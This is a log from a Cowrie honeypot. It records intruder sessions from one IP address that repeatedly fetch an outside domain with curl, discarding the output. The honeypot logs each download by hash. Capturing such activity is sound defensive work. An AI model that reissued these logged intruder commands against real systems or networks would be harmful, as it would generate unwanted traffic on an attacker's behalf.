{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.350074Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.351615Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.352359Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.357938Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.361051Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.385625Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.389362Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.389963Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.394619Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.395911Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.396558Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.402277Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.402837Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.428112Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.429212Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.429631Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.435609Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.436158Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.439772Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.442072Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.443089Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.443705Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.468431Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.469165Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.472013Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.473393Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.478549Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.480754Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.482015Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.482540Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.508001Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.508681Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.511745Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.514511Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.516027Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.516659Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.521395Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.558479Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.559312Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.561360Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.561989Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.564482Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.566794Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.568534Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.569381Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.573177Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.601722Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.602440Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.606330Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.607994Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.609439Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.611617Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.612252Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.643142Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.645022Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.648346Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.650037Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.650715Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.655440Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.656154Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.658744Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.659596Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.664049Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.667196Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.695379Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.700677Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.701676Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.702418Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.709203Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.710113Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.712510Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.713536Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.742167Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.744678Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.747118Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.748118Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.754734Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.755272Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:21.756823Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:21.757587Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
